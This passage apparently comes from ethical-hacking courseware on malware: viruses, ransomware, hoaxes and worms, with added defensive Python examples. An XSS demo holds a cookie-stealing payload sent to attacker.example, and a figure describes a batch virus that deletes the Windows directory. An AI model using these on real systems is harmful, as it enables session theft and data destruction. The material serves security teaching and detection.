sluggishly, and programs closing at random. Modern browsers support add-ons such as
Adblock Plus that let users prevent scripts and other third-party content from being loaded.
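The following Python example is added here to make the non-persistent versus persistent distinction concrete; it is not code from the page. It models a toy review site that stores comments (persistent input) and echoes a search query (non-persistent input), renders each either raw (the web scripting bug) or through html.escape (the hardened form), counts the script elements a browser would execute, and checks a Set-Cookie header for the HttpOnly, Secure and SameSite attributes mentioned above. The comment texts, the attacker host name and the cookie values are constructed for the example.

```python
import html
import re

# Constructed sample inputs for this example; the attacker host is a placeholder.
BENIGN = "Great product, would buy again"
PAYLOAD = ('<script>new Image().src="http://attacker.example/c?"'
           '+document.cookie</script>')


class ReviewSite:
    """Toy web application with a comment store and a search echo.

    escape=False reproduces the web scripting (XSS) bug: untrusted input is
    concatenated straight into the page. escape=True is the hardened form.
    """

    def __init__(self, escape):
        self.escape = escape
        self.comments = []          # persistent (stored) input lives here

    def _render(self, untrusted):
        # html.escape neutralises < > & " ' so the browser treats the text as
        # data rather than markup.
        return html.escape(untrusted, quote=True) if self.escape else untrusted

    def post_comment(self, text):
        self.comments.append(text)

    def comments_page(self):
        # Persistent: every visitor receives every stored comment.
        items = "".join(f"<li>{self._render(c)}</li>" for c in self.comments)
        return f"<html><body><ul>{items}</ul></body></html>"

    def search_page(self, query):
        # Non-persistent: the script only reaches the victim who follows a
        # crafted link carrying it in the query string.
        return f"<html><body>Results for: {self._render(query)}</body></html>"


SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def active_scripts(page):
    """Return the <script> elements a browser would execute in this page."""
    return SCRIPT_RE.findall(page)


def visitors_exposed(site, visitors):
    """Visitors who would run a stored payload when loading the comments page."""
    return visitors if active_scripts(site.comments_page()) else 0


def cookie_is_hardened(set_cookie):
    """True if a Set-Cookie header carries HttpOnly (script cannot read it),
    Secure (sent only over TLS) and a SameSite attribute."""
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie.split(";")[1:]}
    return {"httponly", "secure", "samesite"} <= attrs


if __name__ == "__main__":
    vulnerable, hardened = ReviewSite(escape=False), ReviewSite(escape=True)
    for site in (vulnerable, hardened):
        site.post_comment(BENIGN)
        site.post_comment(PAYLOAD)
    print("stored payload, unescaped:", visitors_exposed(vulnerable, 1000), "of 1000 visitors run it")
    print("stored payload, escaped  :", visitors_exposed(hardened, 1000), "of 1000 visitors run it")
    print("reflected, unescaped     :", len(active_scripts(vulnerable.search_page(PAYLOAD))), "script")
    print("reflected, escaped       :", len(active_scripts(hardened.search_page(PAYLOAD))), "scripts")
    print("cookie hardened:", cookie_is_hardened("session=abc; HttpOnly; Secure; SameSite=Lax"))
```

The point of the two rendering modes is that the same payload reaches one victim through the search page but every visitor through the comments page; escaping at render time closes both, while the HttpOnly attribute limits what a script that does run can read.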
E-mail Viruses
An e-mail virus is computer code sent to you as an e-mail attachment which, if activated,
produces unexpected and usually harmful effects, such as destroying specific files on your hard
disk and causing the attachment to be e-mailed to everyone in your address book.
Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or
stealing personal data. They also vary in how they are presented. For example, the sender of
an email virus may be unknown to the user, or the subject line may be filled with nonsense. In
other cases, a hacker may cleverly disguise the email so that it appears to come from a trusted
or known sender.
To avoid email virus attacks, you should never open (or double-click) an e-mail attachment
unless you know who sent it and what the attachment contains; in addition, you must install
and use antivirus software to scan every attachment before you open it.
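As an added example of the "know what the attachment contains" advice, the Python function below triages an attachment before it is opened: it flags executable extensions, document-looking double extensions such as invoice.pdf.exe, a right-to-left override character hiding the true extension, and a mismatch between the claimed extension and the file's leading magic bytes (an executable renamed as an image). This is not code from the page; the extension lists and the sample attachments (first bytes only) are constructed for the example.

```python
import os

# Extensions Windows executes directly or that carry script; the list is an
# assumption for this example, not an exhaustive policy.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs",
                   ".js", ".jse", ".wsf", ".hta", ".msi", ".dll"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

# Leading bytes that identify the real file type, whatever the name claims.
MAGIC = [
    (b"MZ", "pe-executable"),
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip-container"),        # also .docx/.xlsx/.jar
    (b"\xd0\xcf\x11\xe0", "ole-compound"),   # legacy .doc/.xls, may carry macros
]


def sniff(content):
    """Return the file type implied by the first bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if content.startswith(magic):
            return kind
    return "unknown"


def triage_attachment(filename, content):
    """Return the reasons an attachment should be quarantined ([] = none found)."""
    reasons = []
    name = filename.lower().strip()
    base, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(base)[1]

    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}")
    if ext in EXECUTABLE_EXTS and inner_ext in DOCUMENT_EXTS:
        # "invoice.pdf.exe": a document-looking name hiding an executable
        reasons.append(f"double extension {inner_ext}{ext}")
    if "\u202e" in filename:
        # Right-to-left override makes "report\u202efdp.exe" display as "reportexe.pdf"
        reasons.append("RTL override character in filename")

    kind = sniff(content)
    if kind == "pe-executable" and ext not in EXECUTABLE_EXTS:
        reasons.append(f"PE executable disguised as {ext or 'no extension'}")
    if kind == "ole-compound" and ext in {".doc", ".xls", ".ppt"}:
        reasons.append("legacy Office document; may contain macros, scan before opening")
    return reasons


def triage_mailbox(attachments):
    """Apply triage_attachment to a {filename: bytes} mapping; return only the hits."""
    hits = {}
    for name, data in attachments.items():
        reasons = triage_attachment(name, data)
        if reasons:
            hits[name] = reasons
    return hits


# Constructed sample attachments (first bytes only), not real malware samples.
SAMPLES = {
    "report.pdf": b"%PDF-1.4\n",
    "invoice.pdf.exe": b"MZ\x90\x00\x03",
    "photo.jpg": b"MZ\x90\x00\x03",           # executable renamed to look like an image
    "notes.docx": b"PK\x03\x04",
    "budget.xls": b"\xd0\xcf\x11\xe0\xa1\xb1",
}

if __name__ == "__main__":
    for name, reasons in triage_mailbox(SAMPLES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The magic-byte check is the important one: the extension is chosen by the sender, but the first bytes of the content are what the operating system or viewer will actually act on.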
Armored Viruses
Armored viruses are designed to confuse or trick deployed antivirus systems so that they cannot
detect the actual source of the infection. These viruses make it difficult for antivirus programs to
trace the origin of the attack by making the infection appear to come from some other location,
even though the virus is actually resident on the system itself.
The following basic techniques are adopted by armored viruses:
• Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to
produce an incorrect program listing by disassembly analysis tools.
• Anti-debugging
Anti-debugging techniques are used to detect whether the program is running under a
debugger and to change its behavior if so. This slows down reverse engineering, although it
cannot prevent it.
• Anti-heuristics
Anti-heuristic techniques are used in machine code to defeat heuristic analysis: the code avoids
the suspicious patterns that heuristic scanners look for and relies on the program's ability to
protect itself from programmer and debugger intervention.
• Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the
emulated system environment; they can also secure intellectual property against
emulation-assisted reverse engineering.
• Anti-goat
Goat files are bait files that antivirus researchers use to capture clean samples of a virus.
Anti-goat viruses use heuristic rules to detect possible goat files and refuse to infect them; for
example, the virus will not infect a file that is too small or that contains a large proportion of
do-nothing instructions. As a result, anti-goat viruses require more time to analyze.
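The scanner below is an added Python example, not code from the page, of how an analyst can triage a sample for the armoring techniques listed above before spending time in a debugger. It searches a byte blob for indicators grouped by category: anti-debugging API names and the fs:[30h] PEB read, anti-emulation opcodes (rdtsc, cpuid) and virtual-machine artefact strings, and two well-known anti-disassembly byte sequences. The indicator list and the sample blob are assumptions constructed for the example; two-byte opcodes occur by chance in ordinary code, so the verdict requires hits in more than one category.

```python
# Indicators grouped by the armoring technique they usually implement. Byte
# patterns are x86 encodings; API names appear in the import table or as
# strings resolved at run time. The list is an illustrative assumption, not
# an exhaustive signature set.
INDICATORS = {
    "anti-debugging": [
        ("IsDebuggerPresent import", b"IsDebuggerPresent"),
        ("CheckRemoteDebuggerPresent import", b"CheckRemoteDebuggerPresent"),
        ("NtQueryInformationProcess import", b"NtQueryInformationProcess"),
        ("PEB read via fs:[30h]", b"\x64\xa1\x30\x00\x00\x00"),   # mov eax, fs:[30h]
    ],
    "anti-emulation": [
        ("rdtsc timing check", b"\x0f\x31"),
        ("cpuid (hypervisor bit / vendor string)", b"\x0f\xa2"),
        ("VirtualBox artefact string", b"VBoxGuest"),
        ("VMware artefact string", b"VMware"),
        ("Sandboxie DLL name", b"SbieDll"),
    ],
    "anti-disassembly": [
        ("jz/jnz to the same target followed by a rogue E8 byte", b"\x74\x03\x75\x01\xe8"),
        ("jmp -1 into its own encoding", b"\xeb\xff"),
    ],
}


def find_all(data, pattern):
    """All byte offsets at which pattern occurs in data."""
    offsets, start = [], 0
    while True:
        idx = data.find(pattern, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


def scan_armor(data):
    """Map each armoring category to its sorted (offset, description) hits."""
    hits = {}
    for category, patterns in INDICATORS.items():
        found = [(off, desc) for desc, pat in patterns for off in find_all(data, pat)]
        if found:
            hits[category] = sorted(found)
    return hits


def categories_hit(data):
    return sorted(scan_armor(data))


def armor_verdict(data, min_categories=2):
    """Two-byte opcodes like rdtsc/cpuid occur by chance in ordinary code, so a
    single hit is weak evidence; require hits in several categories."""
    return len(scan_armor(data)) >= min_categories


# Constructed sample: a fake PE header followed by strings and code fragments
# (not a real binary), and a clean control blob.
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 16
          + b"IsDebuggerPresent\x00"
          + b"\x0f\x31\x90\x90"
          + b"\x74\x03\x75\x01\xe8\x00\x00\x00\x00"
          + b"VBoxGuest\x00")
CLEAN = b"MZ\x90\x00" + b"\x00" * 64

if __name__ == "__main__":
    for category, found in scan_armor(SAMPLE).items():
        for offset, desc in found:
            print(f"{category:17} @0x{offset:04x}: {desc}")
    print("armored:", armor_verdict(SAMPLE), "| clean blob armored:", armor_verdict(CLEAN))
```

In practice the same hits would be taken from a real sample's import table and code sections, but the grouping into the page's categories is what tells the analyst which countermeasure (patching the debugger check, running on bare metal, hand-correcting the listing) to prepare for.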
Add-on Viruses
Add-on viruses append their code to the host code without making any changes to the latter, or
relocate the host code in order to insert their own code at the beginning.
[Figure: a JUMP inserted at the start of the original program transfers control to the virus code appended at the end, which JUMPs back to the original program]
Figure 7.48: Working of add-on virus
Intrusive Viruses
Intrusive viruses overwrite the host code completely or partly with the viral code.
[Figure: the viral code overwrites part of the original program in place]
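To show what add-on and intrusive infection do to a host, here is an added Python simulation on a toy instruction set; it is not code from the page and the instruction set, host program and marker "virus" body are assumptions constructed for the example. addon_append follows Figure 7.48 (entry instruction replaced by a JUMP to the appended body, which JUMPs back), addon_prepend relocates the host after the viral code, and intrusive_overwrite overwrites the host's beginning. Running each infected program shows that add-on infection preserves the host's behaviour while intrusive infection destroys it; an entry-point heuristic of the kind antivirus engines use is included.

```python
# Toy instruction set for a file-infection simulation (illustrative assumption,
# not a real executable format): ("push", v) ("add",) ("out",) ("jmp", index)
# ("halt",). A program is a list of these tuples; "jmp" targets are absolute.


def run(program, max_steps=1000):
    """Execute a program; return (output list, halted_cleanly)."""
    stack, out, pc = [], [], 0
    for _ in range(max_steps):
        if pc >= len(program):
            return out, False                 # ran off the end
        op = program[pc]
        try:
            if op[0] == "push":
                stack.append(op[1]); pc += 1
            elif op[0] == "add":
                b, a = stack.pop(), stack.pop(); stack.append(a + b); pc += 1
            elif op[0] == "out":
                out.append(stack.pop()); pc += 1
            elif op[0] == "jmp":
                pc = op[1]
            elif op[0] == "halt":
                return out, True
            else:
                return out, False             # illegal instruction
        except IndexError:                    # stack underflow = crash
            return out, False
    return out, False                         # infinite loop


HOST = [("push", 2), ("push", 3), ("add",), ("out",), ("halt",)]
VIRUS = [("push", "virus ran"), ("out",)]     # benign marker standing in for viral code


def addon_append(host, virus):
    """Figure 7.48 style: the first host instruction is replaced by a JUMP to the
    virus appended at the end; the virus then executes the displaced instruction
    and JUMPs back, so the host still behaves normally."""
    displaced = host[0]
    return [("jmp", len(host))] + host[1:] + list(virus) + [displaced, ("jmp", 1)]


def addon_prepend(host, virus):
    """Relocate the host after the virus body, rebasing its absolute jumps."""
    off = len(virus)
    relocated = [("jmp", op[1] + off) if op[0] == "jmp" else op for op in host]
    return list(virus) + relocated


def intrusive_overwrite(host, virus):
    """Overwrite the beginning of the host in place; nothing restores the
    destroyed instructions, so the host is corrupted."""
    return list(virus) + host[len(virus):]


def entry_jumps_to_tail(program, fraction=0.5):
    """Antivirus-style heuristic: an entry point that immediately jumps near
    the end of the file suggests an appended (add-on) infection."""
    first = program[0]
    return first[0] == "jmp" and first[1] >= len(program) * fraction


if __name__ == "__main__":
    print("clean host      :", run(HOST))
    print("add-on (append) :", run(addon_append(HOST, VIRUS)))
    print("add-on (prepend):", run(addon_prepend(HOST, VIRUS)))
    print("intrusive       :", run(intrusive_overwrite(HOST, VIRUS)))
    print("entry-point heuristic flags append infection:",
          entry_jumps_to_tail(addon_append(HOST, VIRUS)))
```

The clean host prints 5; both add-on forms print the marker and then 5; the intrusive form prints the marker and then crashes on the overwritten instructions, which is why intrusive infections are noticed quickly and add-on infections are not.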
Ransomware
• Ransomware is a type of malware that restricts access to the computer system's files and folders and demands
an online ransom payment to the malware creator(s) to remove the restrictions
• Ransomware families: Dharma, CTB-Locker, Sodinokibi, BitPaymer, CryptXXX, CryptoLocker Ransomware,
CryptoDefense Ransomware
• Dharma is a dreadful ransomware that is distributed to victims through email campaigns; the ransom notes
ask the victims to contact the threat actors via a provided email address and pay in bitcoins
[Figure: Dharma ransom notes]
Ransomware (Cont'd)
• eCh0raix is a new ransomware that specifically targets Linux devices with QNAP Network Attached
Storage (NAS) by employing the AES encryption technique
• SamSam is a notorious ransomware that has infected millions of unpatched servers by employing the
RSA-2048 asymmetric encryption technique
• Dharma
Dharma is a dreadful ransomware that was first identified in 2016; since then, it has
been affecting targets across the globe with new versions, and it has been regularly
updated with sophisticated mechanisms in recent years. At the end of March 2019,
Dharma struck a parking lot system in Canada; previously, it also infected a Texas
hospital and other organizations. Variants of this ransomware use the following
extensions: .adobe, .bip, .combo, .cezar, .ETH, and .java, and its encrypted files receive
new extensions such as .xxxxx and .like. The ransomware employs the AES encryption
algorithm to encrypt data and then displays ransom notes, named either Info.hta or
FILES ENCRYPTED.txt. It is distributed through email campaigns, and the ransom notes
ask victims to contact the threat actors via the provided email address and pay in
bitcoins for the decryption service.
[Figure: Dharma ransom note, "All your files have been encrypted!": it tells the victim that the files were encrypted because of a security problem with the PC, to write to the listed e-mail address quoting the victim's ID in the subject, to use a second address if there is no answer within 24 hours, to pay in bitcoins for the decryption tool, and warns that decrypting the data with third-party software may cause permanent data loss]
• eCh0raix
eCh0raix is a new ransomware that specifically targets Linux devices, namely QNAP
network-attached storage (NAS) appliances. It infects the device and encrypts the
victim's files using the AES encryption technique. The malware was written in the Go
programming language and is very small, about 400 lines of code. Once it infects the
system, it communicates with its C&C server via the Tor network through a SOCKS5
proxy and then initiates the encryption process.
[Figure: eCh0raix ransom screen: "Status: Waiting Payment. If you want decrypting your files send 0.055 BTC (bitcoin) to this address: 1LWqmP4oTjWS3ShtHWm1UjnvaLxfMr2kjm. Or use QR code"]
• SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018.
It was first discovered in 2016; however, it came to be regarded as a grave ransomware
after the WannaCry attack, owing to its vast victim base in 2018. SamSam employs the
RSA-2048 asymmetric encryption technique to encrypt the local files it finds on infected
systems. Unlike most ransomware, it does not attack victims at random: it is a targeted
ransomware aimed at specific, reputed companies, and despite knowing this, large
multinational companies were unable to defend themselves against it. Its attack
technique also differs from that of other ransomware. Nearly all ransomware uses spam
emails to propagate and attack; SamSam instead gains access by brute-forcing weak
passwords on exposed Remote Desktop Protocol (RDP) services.
[Figure: SamSam ransom note]
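Because SamSam's entry vector is RDP password guessing rather than e-mail, the detection that matters is on the logon audit trail. The Python example below is added here and is not code from the page: it runs over constructed Windows security-log records in a simplified CSV form (event 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP), counts failures per source address inside a sliding time window, and reports whether a success from the same source followed the burst, which is the pattern of a guessed password. The window, threshold, addresses and account names are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (made up for this example) in a simplified form:
#   event_id,timestamp,account,source_ip,logon_type
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RDP.
_GUESSED = ["administrator", "admin", "backup", "sa", "test", "guest", "root",
            "scan", "user", "support", "helpdesk", "backup"]
SAMPLE_LOG = "\n".join(
    [f"4625,2019-03-10T02:00:{i:02d},{acct},203.0.113.7,10" for i, acct in enumerate(_GUESSED)]
    + ["4624,2019-03-10T02:01:30,backup,203.0.113.7,10",       # password found
       "4625,2019-03-10T09:15:00,jsmith,192.0.2.25,10",         # an ordinary typo
       "4625,2019-03-10T09:15:40,jsmith,192.0.2.25,10",
       "4625,2019-03-10T09:16:00,svc-web,10.0.0.5,3"])          # network logon, not RDP


def parse(text):
    """Parse the CSV records into dicts with a real datetime."""
    events = []
    for line in text.strip().splitlines():
        eid, ts, account, ip, ltype = line.split(",")
        events.append({"id": int(eid), "time": datetime.fromisoformat(ts),
                       "account": account.lower(), "ip": ip, "type": int(ltype)})
    return events


def detect_rdp_bruteforce(events, window=timedelta(minutes=5), threshold=10):
    """Alert on a source that fails RDP logons >= threshold times inside any
    window, and note whether a success from the same source followed."""
    by_ip = defaultdict(list)
    for e in events:
        if e["type"] == 10:                   # only RemoteInteractive (RDP) logons
            by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["id"] == 4625]
        start, triggered = 0, False
        for end in range(len(failures)):      # sliding window over failures
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            if end - start + 1 >= threshold:
                triggered = True
                break
        if not triggered:
            continue
        last_failure = failures[-1]["time"]
        alerts.append({
            "source_ip": ip,
            "failures": len(failures),
            "accounts": sorted({e["account"] for e in failures}),
            "success_after": any(e["id"] == 4624 and e["time"] >= last_failure for e in evs),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse(SAMPLE_LOG)):
        print(alert)
```

The second source in the sample (two failures for one account) stays under the threshold, and the type 3 network logon is ignored altogether; the alert with success_after set is the one an incident responder would treat as a likely compromised RDP account rather than as noise.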
How to Infect Systems Using a Virus: Creating a Virus
[Figure: Game.bat, a batch-file virus; the script copies itself (copy ... + Game.bat) and deletes c:\Windows\*.*]
When run, it copies itself to all the .bat files in the current directory and deletes all the files in
the Windows directory. Convert the Game.bat batch file to Game.com using the bat2com utility.
How to Infect Systems Using a Virus: Creating a Virus (Cont'd)
[Figure: virus-maker tool interface with options such as Infect All .Mp3 Files, Infect All .Mp4 Files, Infect All .Png Files, Infect Filetype (Enter File Extension To Infect, e.g. txt), Internet Spreading, Send To Contacts (Sends Itself To All Contacts On Microsoft Outlook), As Mail Attachment]
• A well-designed, fake antivirus looks authentic and often encourages users to install it on
their systems, perform updates, or remove viruses and other malicious programs
[Figure: fake antivirus alert screens]
• Virus Hoaxes
• Fake Antivirus
Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to
introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of lost productivity and
bandwidth, as naive users react to them and forward them to other users. Because viruses
tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes
are false alarms reporting nonexistent viruses.
The following are some critical features of virus hoaxes:
• These warning messages, which can be rapidly propagated, state that a particular e-mail
message should not be opened, and that doing so would damage one's system.
• In some cases, these warning messages themselves contain virus attachments.
Try to cross-check the identity of the person who has posted the warning.
It is good practice to look for technical details in any message concerning viruses.
Furthermore, search for information on the Internet to learn more about hoaxes, especially by
scanning bulletin boards on which people actively discuss current community happenings and
concerns. Before drawing conclusions from information found on the Internet, first check the
following:
• If the information is posted by suspicious newsgroups, cross-check it with another source.
• If the person who has posted the news is not an expert or a known person in the
community, cross-check the information with another source.
• If a government body has posted the news, the posting should also reference the
corresponding federal regulation.
• One of the most effective checks is to look up the suspected hoax virus by name on
antivirus software vendors' sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched in which threat actors sent fake Google Critical
Security Alert messages to victims. Google Critical Security Alert is a genuine service that Google
provides to notify users of activity related to their accounts, such as sign-ins, password changes,
and changes to personal information. Attackers create and send fake alert emails notifying
victims that such activity has taken place. Trusting the alert, the user clicks the link provided in
the email and is subsequently infected. The figure below shows a hoax email stating "New device
signed in to"; a victim who reads this email without checking its source clicks the
"CHECK ACTIVITY" button and is trapped.
[Figure: hoax "Google Critical Security Alert" e-mail, apparently from Google, reading "Your Google Account was just signed in to from a new Windows device. You're getting this email to make sure that it was you.", with a CHECK ACTIVITY button and the footer "You received this email to let you know about important changes to your Google Account and services. © 2018 Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA"]
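The checks a user is told to make above ("note the email source" before clicking) can be automated at the mail gateway. The Python example below is added here and is not code from the page: it parses a constructed alert e-mail with the standard library's email module, compares the From and Return-Path domains against a list of trusted sender domains, and inspects every link for a hostname that is untrusted or that differs from the hostname shown in the link text. The trusted-domain list, the message texts, the addresses and the hosts are assumptions constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Domains the genuine alerts would come from; an assumption for this example.
TRUSTED_DOMAINS = {"google.com", "accounts.google.com", "myaccount.google.com"}
LINK_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def is_trusted(host):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def domain_of(header_value):
    """Domain part of the address in a From/Return-Path header ('' if absent)."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def analyze_alert_email(raw):
    """Return the reasons a 'security alert' e-mail looks like a hoax ([] = none)."""
    msg = message_from_string(raw)
    findings = []
    from_domain = domain_of(msg["From"])
    if not is_trusted(from_domain):
        findings.append(f"From domain '{from_domain}' is not a trusted sender domain")
    rp_domain = domain_of(msg["Return-Path"])
    if rp_domain and rp_domain != from_domain:
        findings.append(f"Return-Path domain '{rp_domain}' differs from From domain")
    for href, text in LINK_RE.findall(msg.get_payload()):
        real_host = urlparse(href).hostname or ""
        text = re.sub(r"<[^>]+>", "", text).strip()
        # A link whose visible text is itself a URL must point where it says.
        shown = urlparse(text).hostname if text.lower().startswith(("http://", "https://")) else None
        if shown and shown != real_host:
            findings.append(f"link text shows '{shown}' but points at '{real_host}'")
        if not is_trusted(real_host):
            findings.append(f"link '{text}' points at untrusted host '{real_host}'")
    return findings


# Constructed messages; addresses and hosts are documentation placeholders.
PHISH = """\
From: Google <no-reply@accounts-google-alert.example>
Return-Path: <bounce@mail.example.net>
Subject: Critical security alert
Content-Type: text/html

<p>Your Google Account was just signed in to from a new Windows device.</p>
<a href="http://accounts-google.example/check">CHECK ACTIVITY</a>
<a href="http://198.51.100.9/login">https://myaccount.google.com</a>
"""

LEGIT = """\
From: Google <no-reply@accounts.google.com>
Return-Path: <3AbC@accounts.google.com>
Subject: Security alert
Content-Type: text/html

<p>New sign-in.</p>
<a href="https://myaccount.google.com/notifications">CHECK ACTIVITY</a>
"""

if __name__ == "__main__":
    for label, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(label, analyze_alert_email(raw) or "no findings")
```

The display name "Google" is deliberately ignored by the checks, since it is free text the attacker controls; only the address domains and the link targets carry evidence.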
Upon clicking the ad, pop-up, or link to install the antivirus software, users are redirected to
another page, where they are prompted to buy or subscribe to the antivirus software by
entering their payment details. Once downloaded and installed, fake antivirus software can
cause severe damage to systems: for example, it infects them with malicious software, steals
sensitive information (passwords, bank account numbers, credit card data), and corrupts
files.
Ethical Hacking and Countermeasures
Malware Threats
At present, a new fake antivirus trend has emerged: fake antivirus tools are rapidly
proliferating in the mobile application space. According to AV-Comparatives research,
two-thirds of all antivirus applications in the Android Play Store are fake.
• Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It claims to eliminate
viruses and other malware from mobile devices; however, when it is itself scanned, it is
flagged as a Medium Risk, as shown in the screenshot below.
[Figure: Google Play listing of Free Antivirus 2019]
Computer Worms
• Computer worms are malicious programs that independently replicate, execute, and spread across
network connections, thus consuming available computing resources without human interaction
• Attackers use worm payloads to install backdoors in infected computers, which turns them into
zombies and creates a botnet; these botnets can be used to perform further cyber attacks
How is a Worm Different from a Virus?
• A worm replicates on its own: a worm is a special type of malware that can replicate itself and use
memory but cannot attach itself to other programs
• A worm spreads through the infected network
Computer Worms
Computer worms are standalone malicious programs that replicate, execute, and spread across
network connections independently, without human intervention. Intruders design most worms
to replicate and spread across a network, consuming available computing resources and, in
turn, causing network servers, web servers, and individual computer systems to become
overloaded and stop responding. Some worms also carry a payload that damages the host
system.
Worms are a subtype of viruses. A worm does not require a host file to replicate; however, in
some cases the worm's host machine is also infected. Initially, black hat professionals treated
worms as a mainframe problem. Later, with the introduction of the Internet, they mainly
focused on and targeted the Windows OS, sharing the same worms via e-mail, IRC, and other
network services.
Attackers use worm payloads to install backdoors on infected computers, which turns them
into zombies and creates a botnet. Attackers use these botnets to launch further cyber-attacks.
Some of the latest computer worms are as follows:
• Manero
• Bondat
• Beapy
Virus | Worm
A virus infects a system by inserting itself into a file or executable program | A worm infects a system by exploiting a vulnerability in an OS or application and replicating itself
It might delete or alter the content of files or change the location of files in the system | Typically, a worm does not modify any stored programs; it only exploits the CPU and memory
It alters the way a computer system operates without the knowledge or consent of a user | It consumes network bandwidth, system memory, etc., excessively overloading servers and computer systems
A virus cannot spread to other computers unless an infected file is replicated and sent to the other computers | A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system
A virus spreads at a uniform rate, as programmed | A worm spreads more rapidly than a virus
Viruses are difficult to remove from infected machines | Compared with a virus, a worm can be removed easily from a system
Table 7.4: Difference between virus and worm